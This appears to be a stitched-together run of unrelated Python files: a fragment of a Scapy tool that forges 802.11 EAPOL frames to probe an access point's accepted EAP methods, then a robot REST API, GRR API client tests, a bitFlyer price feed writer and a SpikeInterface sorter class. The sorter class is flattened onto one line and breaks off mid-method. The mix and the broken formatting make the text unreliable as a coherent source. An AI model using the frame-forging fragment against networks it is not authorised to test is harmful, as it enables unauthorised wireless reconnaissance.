                        # reuse the AP's id for our Identity response.
                        if 'type' in fields and fields['type'] == 1 and fields['code'] == 1:
                            i = 0
                            eapid = fields['id']
                            break
            if i == 2:
                return 2
        eap_identity_response = (
            RadioTap()/
            Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
            Dot11QoS()/
            LLC(dsap=170, ssap=170, ctrl=3)/
            SNAP(code=0x888e)/
            EAPOL(version=1, type=0)/
            EAP(code=2, type=1, id=eapid, identity=outer_identity)
        )
        eap_legacy_nak = (
            RadioTap()/
            Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
            Dot11QoS()/
            LLC(dsap=170, ssap=170, ctrl=3)/
            SNAP(code=0x888e)/
            EAPOL(version=1, type=0, len=6)/
            EAP(code=2, type=3, id=eapid + 1, eap_types=[eaptype])
        )
        self.sequence += 1
        for i in range(0, EAP_MAX_TRIES):
            self.__thread_sendp__(eap_identity_response)
            if not self.lastpacket is None:
                if self.lastpacket.haslayer('EAP'):
                    fields = self.lastpacket.getlayer('EAP').fields
                    if fields['code'] == 4:  # 4 is a failure
                        return 3
                    if 'type' in fields and fields['type'] == eaptype:
                        return 0
                    i = 0
                    break
        if i == 2:
            return 2
        for i in range(0, EAP_MAX_TRIES):
            self.__thread_sendp__(eap_legacy_nak)
            if not self.lastpacket is None:
                if self.lastpacket.haslayer('EAP'):
                    fields = self.lastpacket.getlayer('EAP').fields
                    if 'type' in fields and fields['type'] == eaptype:
                        return 0
                    else:
                        return 1
        return 2
robotRestSDK.py
# REST layer for SimplePYBotSDK: exposes robot configuration, status, motors,
# sensors and pose commands over HTTP (Pyramid + wsgiref) on top of the
# socket-based SDK classes.
import logging
import threading
import os
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.events import NewRequest
from wsgiref.simple_server import make_server
import simplepybotsdk.configurations as configurations
from simplepybotsdk.robotWebSocketSDK import RobotWebSocketSDK as RobotWebSocketSDK
from simplepybotsdk.robotSocketSDK import RobotSocketSDK as RobotSocketSDK

logger = logging.getLogger(__name__)

# NOTE(review): os.getenv returns a *string* whenever the variable is set in
# the environment, so `SOCKET_AS_WEB_SOCKET is True` is only satisfied by the
# default value below — any explicit env setting (even "True") selects
# RobotSocketSDK. Confirm whether that is intended.
SOCKET_AS_WEB_SOCKET = os.getenv('SOCKET_AS_WEB_SOCKET', True)


class RobotRESTSDK(RobotWebSocketSDK if SOCKET_AS_WEB_SOCKET is True else RobotSocketSDK):
    """RobotSDK + RobotWebSocketSDK + REST robot's component control with Pyramid."""

    def __init__(self, config_path: str, socket_host: str, socket_port: int, rest_host: str, rest_port: int,
                 robot_speed: float = 1.0, motors_check_per_second: int = None,
                 motors_point_to_point_check_per_second: int = None, socket_send_per_second: int = None):
        """
        :param config_path: SimplePYBotSDK json configuration file path.
        :param socket_host: socket host to listen.
        :param socket_port: socket port to listen.
        :param rest_host: web server host to listen.
        :param rest_port: web server port to listen.
        :param robot_speed: robot speed. Use this to make robot move slower or faster. Default is 1.
        :param motors_check_per_second: numbers of motor's check per second. Set to 0 to disable dedicated thread.
        :param motors_point_to_point_check_per_second: numbers of motor's movement in a second during point to point.
        :param socket_send_per_second: numbers of dump send to the socket client in 1 second.
        """
        super().__init__(config_path, socket_host, socket_port, robot_speed, motors_check_per_second,
                         motors_point_to_point_check_per_second, socket_send_per_second)
        logger.debug("RobotRESTSDK initialization")
        self.rest_base_url = "/api/v1/robot"
        self.rest_enable_cors = True
        self.rest_custom_url = "custom"  # Custom POST path
        self._rest_host = rest_host
        self._rest_port = rest_port
        self._thread_rest = None   # serving thread, created by rest_serve_forever()
        self._server = None        # wsgiref server, created by rest_configure()
        self._dashboard_link = "https://vellons.github.io/SimplePYBotDashboard"

    def rest_configure(self):
        """
        Method to configure web services routes and views.
        """
        with Configurator() as config:
            config.add_route("hello_world", self.rest_base_url + "/")
            config.add_view(self._rest_hello_world, route_name="hello_world")
            config.add_route("rest_configuration", self.rest_base_url + "/configuration/", request_method="GET")
            config.add_view(self._rest_robot_configuration, route_name="rest_configuration")
            config.add_route("rest_status", self.rest_base_url + "/status/", request_method="GET")
            config.add_view(self._rest_robot_status, route_name="rest_status")
            config.add_route("rest_status_abs", self.rest_base_url + "/status/absolute/", request_method="GET")
            config.add_view(self._rest_robot_status_absolute, route_name="rest_status_abs")
            config.add_route("rest_sdk_info", self.rest_base_url + "/sdk/", request_method="GET")
            config.add_view(self._rest_robot_sdk_info, route_name="rest_sdk_info")
            # PATCH routes also accept OPTIONS so CORS preflight succeeds.
            config.add_route("rest_sdk_patch", self.rest_base_url + "/sdk/", request_method=["PATCH", "OPTIONS"])
            config.add_view(self._rest_robot_sdk_patch, route_name="rest_sdk_patch")
            config.add_route("rest_motors", self.rest_base_url + "/motors/", request_method="GET")
            config.add_view(self._rest_robot_motors, route_name="rest_motors")
            config.add_route("rest_motor_by_key", self.rest_base_url + "/motors/{key}/", request_method="GET")
            config.add_view(self._rest_robot_motor_detail_by_key, route_name="rest_motor_by_key")
            config.add_route("rest_motor_patch_by_key", self.rest_base_url + "/motors/{key}/", request_method=["PATCH", "OPTIONS"])
            config.add_view(self._rest_robot_motor_patch_by_key, route_name="rest_motor_patch_by_key")
            config.add_route("rest_go_to_pose", self.rest_base_url + "/go-to-pose/{key}/", request_method=["POST", "OPTIONS"])
            config.add_view(self._rest_robot_go_to_pose, route_name="rest_go_to_pose")
            config.add_route("rest_move_point_to_point", self.rest_base_url + "/move-point-to-point/", request_method=["POST", "OPTIONS"])
            config.add_view(self._rest_robot_move_point_to_point, route_name="rest_move_point_to_point")
            config.add_route("rest_sensors", self.rest_base_url + "/sensors/", request_method="GET")
            config.add_view(self._rest_robot_sensors, route_name="rest_sensors")
            config.add_route("rest_sensors_by_key", self.rest_base_url + "/sensors/{key}/", request_method="GET")
            config.add_view(self._rest_robot_sensors_detail_by_key, route_name="rest_sensors_by_key")
            config.add_route("rest_custom_post", self.rest_base_url + "/" + self.rest_custom_url + "/", request_method=["POST", "OPTIONS"])
            config.add_view(self._rest_robot_custom_post, route_name="rest_custom_post")
            if self.rest_enable_cors:
                config.add_subscriber(add_cors_headers_response_callback, NewRequest)
            app = config.make_wsgi_app()
        self._server = make_server(self._rest_host, self._rest_port, app)

    def rest_serve_forever(self):
        """
        Method to start web services thread.
        """
        # Daemon thread: the web server must not keep the process alive.
        self._thread_rest = threading.Thread(name="rest_thread", target=self._rest_thread_handler, args=())
        self._thread_rest.daemon = True
        self._thread_rest.start()

    def _rest_thread_handler(self):
        # Blocking entry point of the REST thread: logs reachable URLs,
        # prints a ready-made dashboard link, then serves forever.
        logger.debug("[rest_thread]: start serving on {}".format((self._rest_host, self._rest_port)))
        ip_addr = self._rest_host
        if self._rest_host == "0.0.0.0" and self.show_log_message:
            ip_addr = get_my_ip()
            print("[rest_thread]: start serving at:\n\t- Local: http://localhost:{}{}/\n\t- Network: http://{}:{}{}/"
                  .format(self._rest_port, self.rest_base_url, ip_addr, self._rest_port, self.rest_base_url))
        elif self.show_log_message:
            print("[rest_thread]: start serving at: http://{}:{}{}/"
                  .format(ip_addr, self._rest_port, self.rest_base_url))
        if self.show_log_message:
            link = self._dashboard_link + "/?webserverurl=http://" + ip_addr + ":" + str(self._rest_port) + \
                   self.rest_base_url
            if hasattr(self, '_web_socket_port'):
                # Only the websocket-backed base class defines _web_socket_port.
                link += "&websocketurl=ws://" + ip_addr + ":" + str(self._web_socket_port)
            link += "&autoconnect=1"
            link += " Remember to 'Unblock mixed content' in browser"
            print("[rest_thread]: dashboard link: {}".format(link))
        self._server.serve_forever()

    def _rest_hello_world(self, root, request):
        detail = "Hello World! These are web services for robot name: '{}'".format(self.configuration["name"])
        return Response(json_body={"detail": detail})

    def _rest_robot_configuration(self, root, request):
        return Response(json_body=self.configuration)

    def _rest_robot_status(self, root, request):
        return Response(json_body=self.get_robot_dict_status())

    def _rest_robot_status_absolute(self, root, request):
        return Response(json_body=self.get_robot_dict_status(absolute=True))

    def _rest_robot_sdk_info(self, root, request):
        return Response(json_body=self.get_sdk_infos())

    def _rest_robot_sdk_patch(self, root, request):
        # PATCH /sdk/ — update robot_speed (clamped to a 0.05 minimum).
        if request.method == "OPTIONS":
            return Response(json_body={})
        try:
            speed = round(request.json_body["robot_speed"], 2)
            self.robot_speed = 0.05 if speed < 0.05 else speed
            logger.debug("set robot_speed to {}".format(self.robot_speed))
            return Response(json_body=self.get_sdk_infos())
        except Exception as e:
            logger.error("[rest_thread]: robot_sdk_patch: {}".format(e))
            return Response(json_body={"detail": "Bad request. Use robot_speed field"}, status=400)

    def _rest_robot_motors(self, root, request):
        motors = []
        for m in self.motors:
            motors.append(dict(m))
        return Response(json_body=motors)

    def _rest_robot_motor_detail_by_key(self, root, request):
        m = self.get_motor(request.matchdict["key"])
        if m is None:
            return Response(json_body={"detail": "Not found."}, status=404)
        return Response(json_body=dict(m))

    def _rest_robot_motor_patch_by_key(self, root, request):
        # PATCH /motors/{key}/ — set a single motor's goal angle.
        if request.method == "OPTIONS":
            return Response(json_body={})
        m = self.get_motor(request.matchdict["key"])
        if m is None:
            return Response(json_body={"detail": "Not found."}, status=404)
        try:
            m.set_goal_angle(int(request.json_body["goal_angle"]))
            return Response(json_body=dict(m))
        except Exception as e:
            logger.error("[rest_thread]: robot_motor_patch_by_key: {}".format(e))
            return Response(json_body={"detail": "Bad request. Use goal_angle key"}, status=400)

    def _rest_robot_go_to_pose(self, root, request):
        # POST /go-to-pose/{key}/ — optional body {"seconds": n}; values
        # below 0.5s are treated as "immediate" (seconds == 0).
        if request.method == "OPTIONS":
            return Response(json_body={})
        key = request.matchdict["key"]
        seconds = 0
        if request.body and "seconds" in request.json_body:
            seconds = request.json_body["seconds"]
            if type(seconds) is not int and type(seconds) is not float:
                seconds = 0
        seconds = 0 if seconds < 0.5 else seconds
        result = self.go_to_pose(key, seconds, seconds == 0)
        if result:
            return Response(json_body={"detail": "Going to pose {} in {} seconds".format(key, seconds)})
        return Response(
            json_body={"detail": "Something went wrong. See all available pose with /configuration/"}, status=400)

    def _rest_robot_move_point_to_point(self, root, request):
        # POST /move-point-to-point/ — body is {"motor_key": goal_angle, ...}
        # plus an optional "seconds" entry (stripped before dispatch).
        if request.method == "OPTIONS":
            return Response(json_body={})
        try:
            seconds = 0
            pose = dict(request.json_body)
            if "seconds" in request.json_body:
                seconds = request.json_body["seconds"]
                del pose['seconds']
                if type(seconds) is not int and type(seconds) is not float:
                    seconds = 0
            seconds = 0 if seconds < 0.5 else seconds
            self.move_point_to_point(pose, seconds, seconds == 0)
            return Response(json_body={"detail": "Move point to point in {} seconds".format(seconds)})
        except Exception as e:
            logger.error("[rest_thread]: robot_move_point_to_point: {}".format(e))
            return Response(json_body={"detail": "Bad request. Use: {\"motor_key\": goal_angle}"}, status=400)

    def _rest_robot_sensors(self, root, request):
        sensors = []
        for s in self.sensors:
            sensors.append(dict(s))
        return Response(json_body=sensors)

    def _rest_robot_sensors_detail_by_key(self, root, request):
        s = self.get_sensor(request.matchdict["key"])
        if s is None:
            return Response(json_body={"detail": "Not found."}, status=404)
        return Response(json_body=dict(s))

    def _rest_robot_custom_post(self, root, request):
        # POST /custom/ — delegates to the overridable rest_custom_post hook.
        if request.method == "OPTIONS":
            return Response(json_body={})
        response = self.rest_custom_post(request.json_body)
        return Response(json_body=response)

    def rest_custom_post(self, body):
        # Hook for subclasses: receives the parsed JSON body of POST /custom/.
        print("rest_custom_post(): {}".format(body))
        return {"detail": "Override rest_custom_post() method"}


def add_cors_headers_response_callback(event):
    # Pyramid NewRequest subscriber: attaches permissive CORS headers to
    # every response so the hosted dashboard can call these APIs.
    def cors_headers(request, response):
        response.headers.update({
            "Access-Control-Allow-Origin": "*",
            "Access-Control-Allow-Methods": "GET,POST,PATCH,OPTIONS",
            "Access-Control-Allow-Headers": "Origin, Content-Type, Accept",
            "Access-Control-Max-Age": "600",
            "SimplePYBotSDK": configurations.VERSION
        })
    event.request.add_response_callback(cors_headers)


def get_my_ip():
    # Best-effort LAN IP discovery: a UDP "connect" (no traffic sent) to a
    # public address reveals the outbound interface's address.
    try:
        import socket
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("1.1.1.1", 80))
        my_ip = s.getsockname()[0]
        s.close()
        return my_ip
    except:
        return "localhost"
flow_test.py
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Tests for API client and flows-related API calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals

import threading
import time

from absl import app
from future.builtins import range

from grr_api_client import errors as grr_api_errors
from grr_api_client import utils as grr_api_utils
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.util import compatibility
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import flow_base
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_e2e_test_lib
from grr.test_lib import action_mocks
from grr.test_lib import db_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib


# DualDBTest runs every test against both the legacy AFF4 store and the
# relational datastore.
@db_test_lib.DualDBTest
class ApiClientLibFlowTest(api_e2e_test_lib.ApiE2ETest):
  """Tests flows-related part of GRR Python API client library."""

  def testSearchWithNoClients(self):
    clients = list(self.api.SearchClients(query="."))
    self.assertEqual(clients, [])

  def testSearchClientsWith2Clients(self):
    client_urns = sorted(self.SetupClients(2))

    clients = sorted(
        self.api.SearchClients(query="."), key=lambda c: c.client_id)
    self.assertLen(clients, 2)

    for i in range(2):
      self.assertEqual(clients[i].client_id, client_urns[i].Basename())
      self.assertEqual(clients[i].data.urn, client_urns[i])

  def testListFlowsFromClientRef(self):
    client_urn = self.SetupClient(0)
    flow_id = flow_test_lib.StartFlow(
        processes.ListProcesses, client_id=client_urn)

    flows = list(self.api.Client(client_id=client_urn.Basename()).ListFlows())

    self.assertLen(flows, 1)
    self.assertEqual(flows[0].client_id, client_urn.Basename())
    self.assertEqual(flows[0].flow_id, flow_id)
    self.assertEqual(flows[0].data.flow_id, flow_id)

  def testListFlowsFromClientObject(self):
    client_urn = self.SetupClient(0)
    flow_id = flow_test_lib.StartFlow(
        processes.ListProcesses, client_id=client_urn)

    client = self.api.Client(client_id=client_urn.Basename()).Get()
    flows = list(client.ListFlows())

    self.assertLen(flows, 1)
    self.assertEqual(flows[0].client_id, client_urn.Basename())
    self.assertEqual(flows[0].flow_id, flow_id)
    self.assertEqual(flows[0].data.flow_id, flow_id)

  def testCreateFlowWithUnicodeArguments(self):
    # Non-BMP characters exercise unicode round-tripping through the API.
    unicode_str = "🐊 🐢 🦎 🐍"

    client_urn = self.SetupClient(0)

    args = processes.ListProcessesArgs(
        filename_regex=unicode_str, fetch_binaries=True)

    client_ref = self.api.Client(client_id=client_urn.Basename())
    result_flow = client_ref.CreateFlow(
        name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())

    got_flow = client_ref.Flow(flow_id=result_flow.flow_id).Get()
    self.assertEqual(got_flow.args.filename_regex, unicode_str)

  def testCreateFlowFromClientRef(self):
    client_urn = self.SetupClient(0)
    args = processes.ListProcessesArgs(
        filename_regex="blah", fetch_binaries=True)

    # Precondition: no flows exist yet, checked in whichever store is active.
    if data_store.RelationalDBEnabled():
      flows = data_store.REL_DB.ReadAllFlowObjects(client_urn.Basename())
      self.assertEmpty(flows)
    else:
      children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
      self.assertEmpty(list(children))

    client_ref = self.api.Client(client_id=client_urn.Basename())
    result_flow = client_ref.CreateFlow(
        name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())

    if data_store.RelationalDBEnabled():
      flows = data_store.REL_DB.ReadAllFlowObjects(client_urn.Basename())
      self.assertLen(flows, 1)
      self.assertEqual(flows[0].args, args)
    else:
      children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
      self.assertLen(list(children), 1)
      result_flow_obj = aff4.FACTORY.Open(
          result_flow.data.urn, token=self.token)
      self.assertEqual(result_flow_obj.args, args)

  def testCreateFlowFromClientObject(self):
    client_urn = self.SetupClient(0)
    args = processes.ListProcessesArgs(
        filename_regex="blah", fetch_binaries=True)

    if data_store.RelationalDBEnabled():
      flows = data_store.REL_DB.ReadAllFlowObjects(client_urn.Basename())
      self.assertEmpty(flows)
    else:
      children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
      self.assertEmpty(list(children))

    client = self.api.Client(client_id=client_urn.Basename()).Get()
    result_flow = client.CreateFlow(
        name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())

    if data_store.RelationalDBEnabled():
      flows = data_store.REL_DB.ReadAllFlowObjects(client_urn.Basename())
      self.assertLen(flows, 1)
      self.assertEqual(flows[0].args, args)
    else:
      children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
      self.assertLen(list(children), 1)
      result_flow_obj = aff4.FACTORY.Open(
          result_flow.data.urn, token=self.token)
      self.assertEqual(result_flow_obj.args, args)

  def testListResultsForListProcessesFlow(self):
    process = rdf_client.Process(
        pid=2,
        ppid=1,
        cmdline=["cmd.exe"],
        exe="c:\\windows\\cmd.exe",
        ctime=1333718907167083,
        RSS_size=42)

    client_urn = self.SetupClient(0)
    flow_urn = flow_test_lib.TestFlowHelper(
        compatibility.GetName(processes.ListProcesses),
        client_id=client_urn,
        client_mock=action_mocks.ListProcessesMock([process]),
        token=self.token)
    # TestFlowHelper returns an RDFURN under AFF4 but a plain flow id under
    # the relational datastore.
    if isinstance(flow_urn, rdfvalue.RDFURN):
      flow_id = flow_urn.Basename()
    else:
      flow_id = flow_urn

    result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(flow_id)
    results = list(result_flow.ListResults())

    self.assertLen(results, 1)
    self.assertEqual(process.AsPrimitiveProto(), results[0].payload)

  def testWaitUntilDoneReturnsWhenFlowCompletes(self):
    client_urn = self.SetupClient(0)

    flow_id = flow_test_lib.StartFlow(
        processes.ListProcesses, client_id=client_urn)
    result_flow = self.api.Client(
        client_id=client_urn.Basename()).Flow(flow_id).Get()
    self.assertEqual(result_flow.data.state, result_flow.data.RUNNING)

    def ProcessFlow():
      # Finish the flow from a background thread while the main thread
      # blocks in WaitUntilDone().
      time.sleep(1)
      client_mock = action_mocks.ListProcessesMock([])
      flow_test_lib.FinishAllFlowsOnClient(client_urn, client_mock=client_mock)

    t = threading.Thread(target=ProcessFlow)
    t.start()
    try:
      f = result_flow.WaitUntilDone()
      self.assertEqual(f.data.state, f.data.TERMINATED)
    finally:
      t.join()

  def testWaitUntilDoneRaisesWhenFlowFails(self):
    client_urn = self.SetupClient(0)

    flow_id = flow_test_lib.StartFlow(
        processes.ListProcesses, client_id=client_urn)
    result_flow = self.api.Client(
        client_id=client_urn.Basename()).Flow(flow_id).Get()

    def ProcessFlow():
      # Terminate the flow with an error so WaitUntilDone() raises.
      time.sleep(1)
      if data_store.RelationalDBEnabled():
        flow_base.TerminateFlow(client_urn.Basename(), flow_id, "")
      else:
        with aff4.FACTORY.Open(
            client_urn.Add("flows").Add(flow_id), mode="rw",
            token=self.token) as fd:
          fd.GetRunner().Error("")

    t = threading.Thread(target=ProcessFlow)
    t.start()
    try:
      with self.assertRaises(grr_api_errors.FlowFailedError):
        result_flow.WaitUntilDone()
    finally:
      t.join()

  def testWaitUntilDoneRasiesWhenItTimesOut(self):
    client_urn = self.SetupClient(0)

    flow_id = flow_test_lib.StartFlow(
        processes.ListProcesses, client_id=client_urn)
    result_flow = self.api.Client(
        client_id=client_urn.Basename()).Flow(flow_id).Get()

    # Shrink the poll timeout to 1s so the still-running flow times out fast.
    with self.assertRaises(grr_api_errors.PollTimeoutError):
      with utils.Stubber(grr_api_utils, "DEFAULT_POLL_TIMEOUT", 1):
        result_flow.WaitUntilDone()


def main(argv):
  test_lib.main(argv)


if __name__ == "__main__":
  app.run(main)
get_realtime_data.py
# bitFlyer Lightning realtime feed: subscribes to execution/ticker channels
# over JSON-RPC websocket and persists the events into a MySQL database.
import datetime as dt
import hmac
import json
import os
import signal
import time
from datetime import datetime as dtdt
from hashlib import sha256
from secrets import token_hex
from threading import Thread

import websocket

from lib import message, repository
from lib.config import Bitflyer

# -------------------------------------
key = Bitflyer.Api.value.KEY.value
secret = Bitflyer.Api.value.SECRET.value
end_point = 'wss://ws.lightstream.bitflyer.com/json-rpc'
public_channels = ['lightning_executions_FX_BTC_JPY',
                   'lightning_ticker_FX_BTC_JPY']
private_channels = []
database = "tradingbot"
# -------------------------------------


def quit_loop(signal, frame):
    # SIGINT handler: hard-exit so the websocket thread dies with the process.
    os._exit(0)


class bFwebsocket(object):
    """Thin wrapper around websocket-client for the bitFlyer JSON-RPC feed."""

    def __init__(
            self, end_point, public_channels, private_channels, key, secret):
        self._end_point = end_point
        self._public_channels = public_channels
        self._private_channels = private_channels
        self._key = key
        self._secret = secret
        # JSON-RPC request id used to match the auth response in on_message.
        self._JSONRPC_ID_AUTH = 1

    def startWebsocket(self):
        """Open the websocket and keep it running in a background thread."""

        def on_open(ws):
            print("Websocket connected")
            if len(self._private_channels) > 0:
                auth(ws)
            if len(self._public_channels) > 0:
                params = [{'method': 'subscribe', 'params': {'channel': c}}
                          for c in self._public_channels]
                ws.send(json.dumps(params))

        def on_error(ws, error):
            print(error)

        def on_close(ws):
            print("Websocket closed")

        def run(ws):
            # run_forever() returns on disconnect; retry after a short pause.
            while True:
                ws.run_forever()
                time.sleep(3)

        def on_message(ws, message):
            messages = json.loads(message)
            # Handle the auth response.
            if 'id' in messages and messages['id'] == self._JSONRPC_ID_AUTH:
                if 'error' in messages:
                    print('auth error: {}'.format(messages["error"]))
                elif 'result' in messages and messages['result']:
                    # Auth succeeded: subscribe the private channels.
                    params = [{'method': 'subscribe', 'params': {'channel': c}}
                              for c in self._private_channels]
                    ws.send(json.dumps(params))
            if 'method' not in messages or messages['method'] != 'channelMessage':
                return
            params = messages["params"]
            channel = params["channel"]
            recept_data = params["message"]
            if channel == "lightning_executions_FX_BTC_JPY":
                for r in recept_data:
                    # Timestamps arrive as UTC ISO strings; +9h converts to JST.
                    date = r["exec_date"][:26]
                    date = date.replace("T", " ").replace("Z", "")
                    date = \
                        dtdt.strptime(date, '%Y-%m-%d %H:%M:%S.%f')
                    date = date + dt.timedelta(hours=9)
                    side = r["side"]
                    price = r["price"]
                    size = str(r["size"])
                    # NOTE(review): SQL built via str.format — values come from
                    # the exchange feed, but parameterized queries would be safer.
                    sql = "insert into execution_history values (null,'{date}','{side}',{price},'{size}')"\
                        .format(date=date, side=side, price=price, size=size)
                    repository.execute(database=database, sql=sql, log=False)
            if channel == "lightning_ticker_FX_BTC_JPY":
                date = recept_data["timestamp"][:26]
                date = date.replace("T", " ").replace("Z", "")
                date = \
                    dtdt.strptime(date, '%Y-%m-%d %H:%M:%S.%f')
                date = date + dt.timedelta(hours=9)
                best_bid = recept_data["best_bid"]
                best_ask = recept_data["best_ask"]
                # The ticker table holds a single row that is kept up to date.
                sql = "update ticker set date='{date}',best_bid={best_bid},best_ask={best_ask}"\
                    .format(date=date, best_bid=best_bid, best_ask=best_ask)
                repository.execute(database=database, sql=sql, log=False)

        def auth(ws):
            # HMAC-SHA256 over "<timestamp><nonce>" per bitFlyer's auth scheme.
            now = int(time.time())
            nonce = token_hex(16)
            sign = hmac.new(self._secret.encode(
                'utf-8'), ''.join([str(now), nonce]).encode('utf-8'), sha256).hexdigest()
            params = {
                'method': 'auth',
                'params': {
                    'api_key': self._key,
                    'timestamp': now,
                    'nonce': nonce,
                    'signature': sign},
                'id': self._JSONRPC_ID_AUTH}
            ws.send(json.dumps(params))

        ws = websocket.WebSocketApp(
            self._end_point,
            on_open=on_open,
            on_message=on_message,
            on_error=on_error,
            on_close=on_close)
        websocketThread = Thread(target=run, args=(ws, ))
        websocketThread.start()


def initialize():
    # Seed the single-row ticker table on first run.
    sql = "select * from ticker"
    ticker = repository.read_sql(database=database, sql=sql)
    if ticker.empty:
        message.info("initialize ticker")
        sql = "insert into ticker values (now(),0,0)"
        repository.execute(database=database, sql=sql, write=False)


if __name__ == '__main__':
    initialize()
    signal.signal(signal.SIGINT, quit_loop)
    ws = bFwebsocket(end_point, public_channels, private_channels, key, secret)
    ws.startWebsocket()
basesorter.py
""" Here a proposal for the futur Sorter with class approach. The main idea is to decompose all intermediate steps to get more flexibility: * setup the recording (traces, output folder, and so...) * set parameters * run the sorter (with futur possibility to make it in separate env/container) * get the result (SortingExtractor) One benfit shoudl to compare the "run" time between sorter without the setup and getting result. One new idea usefull for tridesclous and maybe other sorter would a way to adapt params with datasets. """ import time import copy from pathlib import Path import threading import shutil import os import datetime import json import traceback import numpy as np import spikeextractors as se class BaseSorter: sorter_name = '' # convinience for reporting installed = False # check at class level if isntalled or not SortingExtractor_Class = None # convinience to get the extractor requires_locations = False _default_params = {} sorter_gui_params = [ {'name': 'output_folder', 'type': 'folder', 'value': None, 'default': None, 'title': "Sorting output folder path", 'base_param': True}, {'name': 'verbose', 'type': 'bool', 'value': True, 'default': True, 'title': "The verbosity of the underlying spike sorter.", 'base_param': True}, {'name': 'grouping_property', 'type': 'str', 'value': None, 'default': None, 'title': "Will sort the recording by the given property ('group', etc.)", 'base_param': True}, {'name': 'parallel', 'type': 'bool', 'value': False, 'default': False, 'title': "If the recording is sorted by a property, then it will do this in parallel", 'base_param': True}, {'name': 'delete_output_folder', 'type': 'bool', 'value': False, 'default': False, 'title': "If True, delete the results of the sorter, otherwise, it won't.", 'base_param': True}, ] installation_mesg = "" # error message when not installed def __init__(self, recording=None, output_folder=None, verbose=False, grouping_property=None, parallel=False, delete_output_folder=False): assert 
self.installed, """This sorter {} is not installed. Please install it with: \n{} """.format(self.sorter_name, self.installation_mesg) if self.requires_locations: if 'location' not in recording.get_shared_channel_property_names(): raise RuntimeError("Channel locations are required for this spike sorter. " "Locations can be added to the RecordingExtractor by loading a probe file " "(.prb or .csv) or by setting them manually.") self.verbose = verbose self.grouping_property = grouping_property self.parallel = parallel self.params = self.default_params() if output_folder is None: output_folder = 'tmp_' + self.sorter_name output_folder = Path(output_folder).absolute() if grouping_property is None: # only one groups self.recording_list = [recording] self.output_folders = [output_folder] if 'group' in recording.get_shared_channel_property_names(): groups = recording.get_channel_groups() if len(groups) != len(np.unique(groups)) > 1: print("WARNING! The recording contains several group. In order to spike sort by 'group' use " "grouping_property='group' as argument.") else: # several groups if grouping_property not in recording.get_shared_channel_property_names(): raise RuntimeError(f"'{grouping_property}' is not one of the channel properties.") self.recording_list = recording.get_sub_extractors_by_property(grouping_property) n_group = len(self.recording_list) self.output_folders = [output_folder / str(i) for i in range(n_group)] # make dummy location if no location because some sorter need it for recording in self.recording_list: if 'location' not in recording.get_shared_channel_property_names(): print('WARNING! No channel location given. 
Add dummy location.') channel_ids = recording.get_channel_ids() locations = np.array([[0, i] for i in range(len(channel_ids))]) recording.set_channel_locations(channel_ids, locations) # make folders for output_folder in self.output_folders: if not output_folder.is_dir(): os.makedirs(str(output_folder)) self.delete_folders = delete_output_folder @classmethod def default_params(self): return copy.deepcopy(self._default_params) def set_params(self, **params): bad_params = [] for p in params.keys(): if p not in self._default_params.keys(): bad_params.append(p) if len(bad_params) > 0: raise AttributeError('Bad parameters: ' + str(bad_params)) self.params.update(params) # dump parameters inside the folder with json self._dump_params() def _dump_params(self): for output_folder in self.output_folders: with open(str(output_folder / 'spikeinterface_params.json'), 'w', encoding='utf8') as f: json.dump(_check_json(self.params), f, indent=4) def run(self, raise_error=True): for i, recording in enumerate(self.recording_list): self._setup_recording(recording, self.output_folders[i]) # dump again params because some sorter do a folder reset (tdc) self._dump_params() now = datetime.datetime.now() log = { 'sorter_name' : str(self.sorter_name), 'sorter_version': str(self.get_sorter_version()), 'datetime': now, } t0 = time.perf_counter() if raise_error: if not self.parallel: for i, recording in enumerate(self.recording_list): self._run(recording, self.output_folders[i]) else: # run in threads threads = [] for i, recording in enumerate(self.recording_list): thread = threading.Thread(target=self._run, args=(recording, self.output_folders[i])) threads.append(thread) thread.start() for thread in threads: thread.join() t1 = time.perf_counter() run_time = float(t1-t0) log['error'] = False else: try: if not self.parallel: for i, recording in enumerate(self.recording_list): self._run(recording, self.output_folders[i]) else: # run in threads threads = [] for i, recording in 
enumerate(self.recording_list): thread = threading.Thread(target=self._run, args=(recording, self.output_folders[i])) threads.append(thread) thread.start() for thread in threads: thread.join() t1 = time.perf_counter() run_time = float(t1-t0) except Exception as err: run_time = None log['error'] = True log['error_trace'] = traceback.format_exc() log['run_time'] = run_time # dump log inside folders for output_folder in self.output_folders: with open(str(output_folder / 'spikeinterface_log.json'), 'w', encoding='utf8') as f: json.dump(_check_json(log), f, indent=4) if self.verbose: if run_time is None: print('Error running', self.sorter_name) else: print('{} run time {:0.2f}s'.format(self.sorter_name, t1 - t0)) return run_time @staticmethod def get_sorter_version(): # need be iplemented in subclass raise NotImplementedError def _setup_recording(self, recording, output_folder): # need be iplemented in subclass # this setup ONE recording (or SubExtractor) # this must copy (or not) the trace in the appropirate format # this must take care of geometry file (ORB, CSV, ...) 
